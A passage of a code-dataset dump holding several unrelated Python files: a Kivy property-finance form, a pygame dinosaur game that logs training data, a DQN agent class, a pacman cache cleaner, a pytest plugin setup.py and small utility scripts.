focus=True))\n\t\tmainlayout.add_widget(layouttab1)\n\t\t#*******CONTENT3*******\n\t\tmainlayout.add_widget(Label(text='Unit Mix',size_hint_x=None, width=200, size_hint_y=None, height=50))\n\t\t#*******CONTENT4*******\n\t\tlayoutmix.add_widget(Label(text='# of Units'))\n\t\tlayoutmix.add_widget(Label(text='Unit Type'))\n\t\tlayoutmix.add_widget(Label(text='SquareFeet'))\n\t\tlayoutmix.add_widget(Label(text='Monthly Rent'))\n\t\tlayoutmix.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutmix.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutmix.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutmix.add_widget(TextInput(text='Input', font_size=15))\n\t\tmainlayout.add_widget(layoutmix)\n\t\t#*******CONTENT7*******\n\t\tmainlayout.add_widget(Label(text='Accounts',size_hint_x=None, width=200, size_hint_y=None, height=50))\n\t\t#*******CONTENT7*******\n\t\tlayoutacc.add_widget(Label(text='Purchase 
Price'))\n\t\tlayoutacc.add_widget(TextInput(text='Input'))\n\t\tlayoutacc.add_widget(Label(text='Deposit'))\n\t\tlayoutacc.add_widget(TextInput(text='Input'))\n\t\tlayoutacc.add_widget(Label(text='Loan Amount'))\n\t\tlayoutacc.add_widget(TextInput(text='Input'))\n\t\tlayoutacc.add_widget(Label(text='Annual Interest'))\n\t\tlayoutacc.add_widget(TextInput(text='Input'))\n\t\tlayoutacc.add_widget(Label(text='Period'))\n\t\tlayoutacc.add_widget(TextInput(text='Input'))\n\t\tlayoutacc.add_widget(Label(text='Total Cash Outlay'))\n\t\tlayoutacc.add_widget(TextInput(text='Input'))\n\t\tmainlayout.add_widget(layoutacc)\n\t\t#*******CONTENT5*******\n\t\tmainlayout.add_widget(Label(text='Expenses',size_hint_x=None, width=200, size_hint_y=None, height=50))\n\t\t#*******CONTENT6*******\n\t\tlayoutexpense.add_widget(Label(text='Accounting'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15,))\n\t\tlayoutexpense.add_widget(Label(text='Advertising'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutexpense.add_widget(Label(text='Bank Charges'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutexpense.add_widget(Label(text='Electricity'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutexpense.add_widget(Label(text='Gas'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutexpense.add_widget(Label(text='Security'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutexpense.add_widget(Label(text='All insurance'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutexpense.add_widget(Label(text='Permits and fees'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutexpense.add_widget(Label(text='Maintenance'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutexpense.add_widget(Label(text='Trash Pick-up'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tlayoutexpense.add_widget(Label(text='All other'))\n\t\tlayoutexpense.add_widget(TextInput(text='Input', font_size=15))\n\t\tmainlayout.add_widget(layoutexpense)\n\t\t#*******CALLING-MAINLAYOUT-IN-TAB1*******\n\t\tscroll.add_widget(mainlayout)\n\t\tth_tab1.content = scroll\n\t\ttp_panel.add_widget(th_tab1)\n\t\t\n\t\t#___*******TAB3*******___#\n\t\tth_tab3 = TabbedPanelHeader(text = 'Saved Reports')\n\t\ttp_panel.add_widget(th_tab3)\n\t\n\t#*******ADDING-CONTENTS-OF-SUB-WIDGETS*******\n\t\tlayoutTop.add_widget(menubtn)\n\t\tlayoutTop.add_widget(head)\n\t\tlayoutTop.add_widget(backbtn)\n\t\tlayoutMid.add_widget(tp_panel)\n\t#*******ADDING-CONTENTS-OF-ROOT-WIDGET*******\n\t\tlayout.add_widget(layoutTop)\n\t\tlayout.add_widget(layoutMid)\n\t#*******CALLING-THE-ROOT-WIDGET*******\t\n\t\treturn layout\n\nif __name__ == '__main__':\n\tProforma().run()\n","sub_path":"ver 0.0.1/main01.py","file_name":"main01.py","file_ext":"py","file_size_in_byte":8115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"448354237","text":"# Usage:\n# python get_sum.py \n# Example:\n# python get_sum.py 2 3\n# expected output: 5\n\n# problem3: run this program with different arguments and see how it works\n# problem4: read the codes in this file, modify some parts, try to enable three\n# arguments and get the sum of them\nimport argparse\n\nparser = argparse.ArgumentParser()\n\nparser = argparse.ArgumentParser(description='Print the sum of 
numbers.')\nparser.add_argument(\"num1\", help=\"First number\", type=int)\nparser.add_argument(\"num2\", help=\"Second number\", type=int)\nparser.add_argument(\"num3\", help=\"Third number\", type=int)\n\nargs = parser.parse_args()\nprint( args.num1 + args.num2 + args.num3)\n","sub_path":"lecture1/get_sum.py","file_name":"get_sum.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"448499343","text":"import pygame\r\nimport random\r\nimport time\r\nimport csv\r\nimport cv2\r\nimport os, shutil\r\nfrom skimage import exposure\r\nimport numpy as np\r\n\r\n\r\n\r\n\r\n\r\n#THIS GAME WAS BUILT SO THAT A BOT COULD THEN USE NEURAL NETWORKS TO LEARN HOW TO PLAY IT\r\n\r\n#IT IS MEANT TO SIMULATE THE GAME THAT IS PLAYED WHEN GOOGLE BREAKS\r\n\r\n\r\n#INITIAL SETUP\r\n\r\npygame.init()\r\n\r\ndisplay_width = 800\r\ndisplay_height = 600\r\n\r\nblack = (0, 0, 0)\r\nwhite = (255, 255, 255)\r\nbloc_colour = (215, 14, 190)\r\nred = (200, 0, 0)\r\ngreen = (0, 200, 0)\r\nbright_red = (255, 0, 0)\r\nbright_green = (0, 255, 0)\r\n\r\ngameDisplay = pygame.display.set_mode((display_width, display_height))\r\n\r\nrect = pygame.Rect(150, display_height * 0.43, 650, 180)\r\nsub = gameDisplay.subsurface(rect)\r\n\r\n\r\npygame.display.set_caption('Google Game')\r\n\r\nclock = pygame.time.Clock()\r\n\r\n\r\ndinoImg = pygame.image.load(\"dinosaur.jpg\")\r\ndinoImg = pygame.transform.scale(dinoImg, (70, 60))\r\ndinoImg2 = pygame.transform.scale(dinoImg, (70, 20))\r\n\r\n\r\n\r\n\r\n#USED CLASSES\r\n\r\n\r\nclass cactus:\r\n def __init__(self, name, x, y):\r\n self.name = name\r\n self.x = x\r\n self.y = y\r\n self.color = green\r\n self.counted = False\r\n\r\nclass bird:\r\n def __init__(self, name, x, y):\r\n self.name = name\r\n self.x = x\r\n self.y = y\r\n self.color = red\r\n self.counted = False\r\n\r\n\r\n\r\n\r\n#USED FUNCTIONS\r\n\r\n\r\ndef objects_dodged(dodge_count):\r\n font = pygame.font.SysFont(None, 25)\r\n text = font.render(\"Dodged: \" + str(dodge_count), True, black)\r\n gameDisplay.blit(text, (400, 0))\r\n\r\ndef dinosaur(x, y, image):\r\n gameDisplay.blit(image, (x, y))\r\n\r\ndef text_objects(text, font):\r\n textSurface = font.render(text, True, black)\r\n return textSurface, textSurface.get_rect()\r\n\r\ndef message_display(text):\r\n largeText = pygame.font.Font('freesansbold.ttf', 90)\r\n TextSurf, TextRect = text_objects(text, largeText)\r\n TextRect.center = (display_width / 2, display_height / 2)\r\n gameDisplay.blit(TextSurf, TextRect)\r\n pygame.display.update()\r\n time.sleep(1)\r\n game_loop()\r\n\r\ndef crash():\r\n #message_display('Broken dinosaur')\r\n pygame.quit()\r\n quit()\r\n\r\ndef jump(y, u, t, a):\r\n y -= u * t + (0.5 * a * (t ** 2))\r\n v = u + (a * t)\r\n u = v\r\n return y, u\r\n\r\ndef data_capture(n, record1, record2, reward_difference, game_running):#, stacked_list):\r\n\r\n pygame.image.save(sub, \"./GameScreenShots/\" + str(n) + \"screenshot.jpg\")\r\n img = cv2.imread(\"./GameScreenShots/\" + str(n) + \"screenshot.jpg\")\r\n img = cv2.Canny(cv2.resize(img, (100, 100)), 100, 200)\r\n #img = img.reshape(1, 1, img.shape[0], img.shape[1])\r\n\r\n #img = np.append(img, stacked_list[:, :3, :, :], axis=2)\r\n\r\n cv2.imwrite(\"./GameScreenShots/\" + str(n) + \"screenshot.jpg\", img)\r\n\r\n with open('InputData.csv', 'a', newline='') as f:\r\n thewriter = csv.DictWriter(f, fieldnames=fieldnames)\r\n thewriter.writerow({'KeyUp/Down': record1, 'Jump/Duck': record2, 'Reward 
difference': reward_difference, 'Game Running': game_running})\r\n\r\n #return stacked_list\r\n\r\ndef game_loop():\r\n obj_list = []\r\n x = display_width*0.1\r\n y_initial = display_height*0.65\r\n y = y_initial\r\n u_initial = 220\r\n fps = clock.tick(60)\r\n gameExit = False\r\n cactus_x = 900\r\n count = 0\r\n u = u_initial\r\n a = -160\r\n image = dinoImg\r\n skip = False\r\n duck_land = False\r\n tracker = 0\r\n object_x = 25\r\n object_y = 100\r\n dodged = 0\r\n object_speed = 5\r\n n = 0\r\n blank_image = np.zeros((100, 100, 3), np.uint8)\r\n stacked = np.stack((blank_image, blank_image, blank_image, blank_image), axis=2)\r\n\r\n\r\n\r\n while not gameExit:\r\n record1 = 0\r\n record2 = 0\r\n object_reward = 0\r\n game_running = True\r\n for event in pygame.event.get():\r\n\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n\r\n\r\n #BELOW DEFINES HOW THE DINOSAUR REACTS TO KEYBOARD INPUTS\r\n\r\n\r\n\r\n if event.type == pygame.KEYDOWN:\r\n record1 = event.type\r\n record2 = event.key # 273 and 274 are the up and down keys\r\n if event.key == pygame.K_UP:\r\n y, u = jump(y, u, 1/fps, a)\r\n image = dinoImg\r\n skip = False\r\n\r\n elif event.key == pygame.K_DOWN and y == y_initial:\r\n image = dinoImg2\r\n y = y_initial + 40\r\n skip = True\r\n\r\n if event.key == pygame.K_DOWN and y < y_initial:\r\n duck_land = True\r\n\r\n if event.type == pygame.KEYUP:\r\n record1 = event.type\r\n record2 = event.key\r\n if event.key == pygame.K_DOWN and u == u_initial:\r\n image = dinoImg\r\n y = y_initial\r\n skip = False\r\n if event.key == pygame.K_DOWN:\r\n duck_land = False\r\n\r\n\r\n if duck_land is True and y == y_initial:\r\n image = dinoImg2\r\n y = y_initial + 40\r\n skip = True\r\n\r\n if y != y_initial and skip == False:\r\n y, u = jump(y, u, 1 / fps, a)\r\n\r\n if y >= y_initial:\r\n y = y_initial\r\n u = u_initial\r\n\r\n\r\n\r\n gameDisplay.fill(white)\r\n objects_dodged(dodged)\r\n pygame.draw.line(gameDisplay, black, (0, 0.6*display_height), (display_width, 0.6*display_height))\r\n dinosaur(x, y, image)\r\n\r\n rand_no = random.randint(0, 100)\r\n\r\n\r\n\r\n #THE TWO IF STATEMENTS BELOW GENERATE THE CACTUS AND BIRDS\r\n if rand_no == 10 and tracker == 0:\r\n cact = cactus(\"cactus\", cactus_x, display_height * 0.57)\r\n obj_list.append(cact)\r\n tracker += 60\r\n\r\n count += 1\r\n\r\n if count > 10 and rand_no == 1 and tracker == 0:\r\n bir = bird(\"bird\", cactus_x, display_height * 0.49)\r\n obj_list.append(bir)\r\n tracker += 60\r\n\r\n count += 1\r\n\r\n for i in obj_list:\r\n if i.x + object_x < 0:\r\n del(obj_list[0])\r\n\r\n image_x = image.get_size()[0]\r\n image_y = image.get_size()[1]\r\n\r\n #BELOW CREATES THE CRASH LOGIC\r\n for i in obj_list:\r\n\r\n i.x -= object_speed\r\n pygame.draw.rect(gameDisplay, i.color, [i.x, i.y, object_x, object_y])\r\n if (y + image_y > i.y) and (y < i.y + object_y):\r\n if (x + image_x > i.x) and (x < i.x + object_x):\r\n round_reward = -1\r\n game_running = False\r\n data_capture(n, record1, record2, round_reward, game_running) #, stacked)\r\n crash()\r\n\r\n if i.x + object_x < x and i.counted == False:\r\n dodged += 1\r\n object_reward = 0.9\r\n object_speed += 0.1\r\n i.counted = True\r\n\r\n if tracker !=0:\r\n tracker -= 1\r\n\r\n\r\n\r\n pygame.display.update()\r\n fps = clock.tick(60)\r\n\r\n\r\n round_reward = 0.1 + object_reward\r\n data_capture(n, record1, record2, round_reward, game_running)#, stacked)\r\n n += 1\r\n\r\n\r\nwith open('InputData.csv', 'w', newline='') as f:\r\n fieldnames = ['KeyUp/Down', 
'Jump/Duck', 'Reward difference', 'Game Running']\r\n thewriter = csv.DictWriter(f, fieldnames=fieldnames)\r\n thewriter.writeheader()\r\n\r\n\r\nfolder = './GameScreenShots'\r\nfor the_file in os.listdir(folder):\r\n file_path = os.path.join(folder, the_file)\r\n try:\r\n if os.path.isfile(file_path):\r\n os.unlink(file_path)\r\n except Exception as e:\r\n print(e)\r\n\r\nrunning = True\r\n\r\nwhile running == True:\r\n game_loop()\r\npygame.quit()\r\n\r\nquit()\r\n","sub_path":"google_game.py","file_name":"google_game.py","file_ext":"py","file_size_in_byte":7768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"359005346","text":"import subprocess\nimport random as r\n\nalphavit = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\nnums = [i for i in range(1,20)]\nname = []\n\nprint (nums)\ndef randWord(num):\n\tfor i in range(num):\n\t\trandLet = r.choice(alphavit)\n\t\tname.append(randLet)\n\treturn name\n\ndef randNum():\n\tn = r.choice(nums)\n\treturn n\n\t\n\nfor i in range(45):\n\tname = []\n\tnomer = randNum()\n\tnameFolder = ''.join(str(j) for j in randWord(nomer))\n\tprint(nameFolder)\n\tsubprocess.call(['mkdir',nameFolder])\n","sub_path":"scriptFolder.py","file_name":"scriptFolder.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"377687535","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport codecs\nimport os\n\nfrom setuptools import setup\n\n\ndef read(fname):\n file_path = os.path.join(os.path.dirname(__file__), fname)\n return codecs.open(file_path, encoding='utf-8').read()\n\n\nsetup(\n name='pytest-dev8',\n version='0.1.1',\n author='Simon Kerr',\n author_email='jackofspaces@gmail.com',\n maintainer='Simon Kerr',\n maintainer_email='jackofspaces@gmail.com',\n license='Apache Software License 2.0',\n url='https://github.com/symonk/pytest-valid8',\n description='to validate an environment before commencing a session',\n long_description=read('README.rst'),\n py_modules=['pytest_valid8'],\n python_requires='>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*',\n install_requires=['pytest>=5.0.1', 'yaspin>=0.15.0'],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Framework :: Pytest',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Testing',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Operating System :: OS Independent',\n 'License :: OSI Approved :: Apache Software License',\n ],\n entry_points={\n 'pytest11': [\n 'valid8 = pytest_valid8',\n ],\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"71032129","text":"# -*- coding: utf-8 -*-\nimport random\nimport numpy as np\nfrom goal_model import Tree, Node\nfrom mind import BrainFunction, BehavioralEngine, ReplayMemory, BehavioralRange, baredom_control, fn_linearbehavioralvalue, fn_constantbehavioralcontrol\nimport math\n\nclass DQNAgent:\n def __init__(self, state_size, action_size, proprioception_size=2):\n if type(state_size) == tuple:\n self.state_size = state_size\n else:\n self.state_size = (state_size, state_size)\n self.nb_behavior = 1\n self.nb_goals = 6\n self.KEY_CODE = 5\n self.GATE_CODE = 4\n self.skip_frames = 4\n\n #No visual 
input information: touch, object value, min_var, max_var, var, x, y, z, angle, goal\n performerScore = BrainFunction(state_size, proprioception_size, action_size, [ReplayMemory(5000)], self.skip_frames)\n performerScore.epsilon_min = 0.05\n performerScore.epsilon_decay = ((performerScore.epsilon - performerScore.epsilon_min)/10000)\n performerScore.learning_rate = 0.00025 # 0.00025\n performerScore.MAX_RANDOM_STEPS = 1000\n \n \n #performerFollowKey = BrainFunction(state_size, proprioception_size, action_size, [ReplayMemory(10000)], self.skip_frames)\n \n #performerGetKey = BrainFunction(state_size, proprioception_size, action_size, [ReplayMemory(10000)], self.skip_frames)\n \n performerSearchKey = BrainFunction(state_size, proprioception_size, action_size, [ReplayMemory(20000)], self.skip_frames)\n \n #performerEating = BrainFunction(state_size, proprioception_size, action_size, [ReplayMemory(10000)], self.skip_frames)\n #performerEating.epsilon_min = 0.05\n #performerEating.epsilon_decay = ((performerEating.epsilon - performerEating.epsilon_min)/10000)\n #performerEating.learning_rate = 0.00025 # 0.00025\n #performerEating.MAX_RANDOM_STEPS = 1000\n \n #performerFollowTel = BrainFunction(state_size, proprioception_size, action_size, [ReplayMemory(10000)], self.skip_frames)\n #performerFollowTel.epsilon_min = 0.05\n #performerFollowTel.epsilon_decay = ((performerFollowTel.epsilon - performerFollowTel.epsilon_min)/10000)\n #performerFollowTel.learning_rate = 0.00025 # 0.00025\n #performerFollowTel.MAX_RANDOM_STEPS = 1000\n\n #self.performers = [performerEating, performerSearchKey, performerFollowKey, performerGetKey, performerFollowTel, performerScore]\n self.performers = [None]*self.nb_goals\n self.performers[1] = performerSearchKey\n self.baredom = BehavioralRange(\"baredom\", self, 0.0, 0.1, 1.0, fn_control=baredom_control)\n self.last_action = -1\n self.prev_position = None\n self.position = None\n self.prev_dist_to_key = 0\n self.prev_dist_to_gate = 0\n self.target_position = None\n self.energy = 0\n self.baredom_value = 0\n self.score = 0\n self.isWithKey = 0\n self.last_reward = 0.0\n self.gate_position = np.array([262.65, -143.74, 305.13])\n self.MIN_TESTS = 10000\n self.fitness = np.zeros(5)\n self.last_frame = None\n self.touching_food = False\n self.detected_target_counter = 0\n self.to_target_dir = 0.0\n self.orientation = 0\n self.contextual_actions = [0, 1, 2, 3, 4, 5, 6, 7]\n self.baredom_freq = 0.0\n self.action_count = [0]*7\n self.start_time = 0\n self.prev_orientation = self.orientation\n self.goal_test_counter = 0\n\n def get_current_goal(self):\n #if self.touching_food:\n # return 0\n #if self.is_to_learning_search_key():\n return 1\n #if self.is_to_learning_follow_key():\n # return 2\n #if self.is_to_learning_get_key():\n # return 3\n #if self.is_to_learning_follow_gate():\n # return 4\n #return 5\n\n def get_rewards(self):\n return [self.r_get_foods(), self.r_search_key(), self.r_target_follow(), self.r_get_key(), self.r_gate_follow(), self.r_get_score()]\n\n def is_to_learning_follow_gate(self):\n return self.isWithKey\n\n def is_to_learning_get_key(self):\n return (self.get_dist_to_target() < 20) and (not self.isWithKey)\n \n def is_to_learning_follow_key(self):\n return (not self.isWithKey) and (self.KEY_CODE in self.last_frame)\n\n def is_to_learning_search_key(self):\n return (not self.isWithKey) and (not self.KEY_CODE in self.last_frame)\n\n def is_to_learning_eating(self):\n return self.touching_food\n\n def get_walk_dist(self):\n return 
abs(self.prev_position[0] - self.position[0]) + abs(self.prev_position[2] - self.position[2])\n\n def get_dist_to_target(self):\n return abs(self.position[0] - self.target_position[0]) + abs(self.position[2] - self.target_position[2])\n \n def get_dist_to_gate(self):\n return abs(self.position[0] - self.gate_position[0]) + abs(self.position[2] - self.gate_position[2])\n\n def r_get_score(self): #0\n return self.score\n\n def r_get_foods(self): #3\n return self.last_reward\n\n def r_get_key(self): #2\n if self.get_dist_to_target() < 5:\n return 1.0 if self.isWithKey else -1.0\n else:\n return 0.0\n\n def r_target_follow(self): #4\n if self.get_dist_to_target() < self.prev_dist_to_key:\n return 1\n elif self.get_dist_to_target() > self.prev_dist_to_key:\n return -1\n else:\n return 0\n\n def r_search_key(self): #5\n if self.KEY_CODE in self.last_frame:\n return 1.0\n else:\n return -1.0\n\n def calc_to_target_dir(self):\n tv = self.target_position - self.position\n tv = np.array([tv[0], tv[2]])\n av = np.array([0.0, 1.0])\n x = av[0]\n y = av[1]\n av[0] = x * np.cos(self.orientation) - y * np.sin(self.orientation)\n av[1] = x * np.sin(self.orientation) + y * np.cos(self.orientation)\n nav = np.linalg.norm(av)\n ntv = np.linalg.norm(tv)\n if nav != 0 and ntv != 0:\n av = av/nav\n tv = tv/ntv \n v = np.dot(av, tv)\n #print(v)\n return v\n else:\n return 0\n\n\n def r_gate_follow(self): #1\n if self.get_dist_to_gate() < self.prev_dist_to_gate:\n return 1\n elif self.get_dist_to_gate() > self.prev_dist_to_gate:\n return -1\n else:\n return 0\n\n def r_homeostatic(self):\n return np.tanh(self.baredom_value)\n\n def reset(self, is_new_epoch=True):\n self.baredom_freq = 0.0\n self.action_count = [0]*7\n self.start_time = 0\n for goal in range(self.nb_goals):\n if self.performers[goal] != None:\n self.performers[goal].reset(is_new_epoch)\n self.baredom.current_value = 0\n self.baredom.initial_value = 0\n self.baredom.min = np.random.random() * 0.90\n self.baredom.max = min(1.0, (self.baredom.min + abs(np.random.normal(0.0, 1.0) ) ) )\n self.sum_of_rewards = 0\n self.prev_dist_to_gate = 0\n self.prev_dist_to_key = 0\n self.to_target_dir = 0.0\n self.prev_orientation = self.orientation\n","sub_path":"agents/agent_dqn/bagent.py","file_name":"bagent.py","file_ext":"py","file_size_in_byte":7279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"354426544","text":"import os\nimport uuid\nimport argparse\n\nfrom prep_lobe_data import normalize\n\ndef main():\n parser = argparse.ArgumentParser(description='Create corpus for aligning from LOBE format.')\n parser.add_argument('data', type=str, help='Full path to dataset')\n parser.add_argument('corpus', type=str, help='Destination data folder')\n\n args = parser.parse_args()\n data = args.data\n corpus = args.corpus\n\n f = open(os.path.join(data, \"index.tsv\"))\n lines = f.readlines()\n\n norm2nat = dict()\n for l in lines:\n speaker, recording, text = l.strip().split(\"\\t\")\n\n text_file = os.path.join(data, \"text\", text) \n with open(text_file) as fi:\n text = fi.read()\n norm_text = normalize(text).strip()\n norm2nat[norm_text] = text.strip()\n\n index = open(os.path.join(corpus, \"index.tsv\"))\n fixed = open(os.path.join(corpus, \"index.nat.tsv\"), \"w\")\n for l in index.readlines():\n rid, norm = l.split(\"\\t\")\n fixed.write(\"\\t\".join([\n rid,\n norm2nat[norm.strip()],\n norm.strip(),\n ]) + \"\\n\")\n\n\nif __name__ == \"__main__\":\n 
main()\n","sub_path":"tts/norm2nat.py","file_name":"norm2nat.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"535150548","text":"#!/usr/bin/env python3\n\nimport os\nimport errno\nimport argparse\nfrom operator import attrgetter\n\nPACKAGES = \"/var/cache/pacman/pkg/\"\nINSTALLED = \"/var/lib/pacman/local\"\nEXTENSIONS = [\"pkg.tar.xz\", \"pkg.tar.gzip\"]\nARCHES = [\"any\", \"x86_64\", \"i686\"]\nNR_OF_PKG = 2\n\n\nclass Package(object):\n '''base class for all kinds of packages, installed or package files'''\n\n def __str__(self):\n return self.name + \"-\" + self.version + \"-\" + self.pkg_version\n \n def __repr__(self):\n return repr((self.name, self.version, self.pkg_version, self.arch))\n\n def __eq__(self, other):\n assert isinstance(other, Package)\n return self.name == other.name and self.version == other.version and self.pkg_version == other.pkg_version and self.arch == other.arch\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __lt__(self, other):\n if self.__eq__(other):\n return false\n elif self.name == other.name:\n if self.version == other.version:\n return self.pkg_version < other.pkg_version\n else:\n return self.version < other.version\n else:\n return self.name < other.name\n \n def __le__(self, other):\n return self.__eq__(other) or self.__lt__(other)\n\n def __gt__(self, other):\n return not self.__le__(other)\n\n def __ge__(self, other):\n return self.__eq__(other) or self.__gt__(other)\n\nclass PkgFile(Package):\n '''Class for holding info about on specific package'''\n\n def __init__(self, filename, path):\n self.filename = filename\n self.fullpath = os.path.join(path, filename)\n self.name, self.version, self.pkg_version, rest = filename.rsplit('-', 3)\n self.arch, self.file_ext = rest.split('.',1)\n\nclass InstalledPkg(Package):\n '''class for installed packages on the system'''\n\n def __init__(self, name, version, arch):\n self.name = name\n self.version, self.pkg_version = version.split('-')\n self.arch = arch\n\nclass PkgList(object):\n '''Class for holding a complete list over package files on the system'''\n\n\n def __str__(self):\n res = \"\"\n for pkg in self.pkg_list:\n if pkg != self.pkg_list[0]:\n res += \"\\n\"\n res += pkg.__str__()\n return res\n\n def sort(self):\n self.pkg_list = sorted(self.pkg_list, key = attrgetter(\"name\", \"version\", \"pkg_version\"))\n\n def names(self):\n return [i.name for i in self.pkg_list ]\n\n def get_by_name(self, name):\n result = []\n for pkg in self.pkg_list:\n if pkg.name == name:\n result.append(pkg)\n return result\n\n def unique(self):\n result = []\n for pkg in self.pkg_list:\n if pkg.name not in result:\n result.append(pkg.name)\n return result\n\nclass PkgFileList(PkgList):\n \n def __init__(self, path):\n self.path = path\n self.pkg_list = []\n filelist = [ f for f in os.listdir(path) if f.endswith(tuple(EXTENSIONS)) ]\n for f in filelist:\n self.pkg_list.append(PkgFile(f, path))\n\nclass InstalledPkgList(PkgList):\n\n def __init__(self, path):\n self.path = path\n self.pkg_list = []\n pkgs = [ p for p in os.listdir(path) if os.path.isdir(os.path.join(path, p)) ]\n for p in pkgs:\n filepath = os.path.join(path, p, \"desc\")\n with open(filepath) as f:\n lines = [ i.strip('\\n') for i in f.readlines() ]\n name = lines[lines.index(\"%NAME%\") + 1]\n version = lines[lines.index(\"%VERSION%\") + 1]\n arch = lines[lines.index(\"%ARCH%\") + 1]\n self.pkg_list.append(InstalledPkg(name, 
version, arch))\n\ndef uninstalled_packages(pkgfiles, installed):\n result = []\n for pkgfile in pkgfiles.pkg_list:\n if pkgfile.name not in installed.names():\n result.append(pkgfile)\n return result\n\ndef older_than(pkgfiles, installed, number):\n result = []\n for pkg in installed.unique():\n full_list = pkgfiles.get_by_name(pkg)\n if(len(full_list) > number):\n full_list = sorted(full_list, key = attrgetter(\"name\", \"version\",\n\"pkg_version\"))\n #print(full_list)\n if len(full_list[0:-number]) > 0:\n #result.append(full_list[0:-number])\n for pkg in full_list[0:-number]:\n result.append(pkg)\n return result\n\ndef find_files(packages, pkgfiles):\n res = []\n for package in packages:\n for pkgfile in pkgfiles.pkg_list:\n if pkgfile == package:\n res.append(pkgfile)\n return res\n\ndef print_packages(packages):\n for pkg in packages:\n print(pkg)\n\ndef print_installed(packages):\n for pkglist in packages:\n for pkg in pkglist:\n print(pkg)\n\ndef remove_packages(packages):\n for pkg in packages:\n assert isinstance(pkg, PkgFile)\n print(\"deleting... \" + pkg.__str__())\n try:\n os.remove(pkg.fullpath)\n except OSError as e:\n if e.errno == errno.EACCES:\n print(\"You don't have premissions to delete this file. Run as Root?\")\n exit()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Clean up pacman\\'s cache. More flexible than \"pacman -Sc[c]\"')\n\n # REQUIRED ARGUMENTS\n parser.add_argument('--uninstalled', '-u', action = 'store_true', help='list packages that is not installed on the system')\n parser.add_argument('--morethan', '-m', action = 'store_true', help='list packages that has more than the specified number of files in the cache')\n\n # OPTIONAL ARGUMENTS\n parser.add_argument('--delete', action = 'store_true', help='if this option is set, the packages listed by \"uninstalled\" or \"morethan\" is deleted.')\n parser.add_argument('--number', '-n', metavar='n', type=int, default=NR_OF_PKG, help='number of packages that you want to keep as a backup. 
Defaults to 2.')\n parser.add_argument('--cache_path', '-c', metavar='PATH', type=str, default=PACKAGES, help='optional path to pacman\\'s cache')\n parser.add_argument('--installed_path', '-i', metavar='PATH', type=str, default=INSTALLED, help='optional path to pacman\\'s installed package db')\n\n args = parser.parse_args()\n\n if not (args.uninstalled or args.morethan):\n parser.error(\"Need to specify -u, -t or both\")\n \n installed = InstalledPkgList(args.installed_path)\n pkgfiles = PkgFileList(args.cache_path)\n old = older_than(pkgfiles, installed, args.number)\n uninstalled = uninstalled_packages(pkgfiles, installed)\n\n if not args.delete:\n if args.uninstalled:\n print_packages(uninstalled)\n if args.morethan:\n print_packages(old)\n\n else:\n if args.uninstalled:\n remove_packages(uninstalled)\n if args.morethan:\n old_files = find_files(old, pkgfiles)\n remove_packages(old_files)\n","sub_path":"pacleaner.py","file_name":"pacleaner.py","file_ext":"py","file_size_in_byte":7043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"209183930","text":"#!/usr/bin/env python\n#coding=iso-8859-15\n#Image resizing Programm\nimport PIL\nfrom PIL import Image\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\n\n#write names of resized images in quotes\n#or use drag and drop\n#----------------------------------------\n\n#function to convert one picture\ndef one():\n\tconvert = input('enter name of picture: ')\n\tx = input('enter width: ')\n\ty = input('enter height: ')\n\tnewsize = (x,y)\n\tname = input('enter name of resized image: ')\n\tos.chdir('images')\n\tos.chdir('resized')\n\timg = Image.open(convert)\n\tfil = img.resize(newsize)\n\tfil.save(name +'.png', 'PNG')\n#---------------------------------------------------------------\ndec = input ('Image_Resizer\\n-------------\\nset name of resized files in quotes\\n\\n1. 
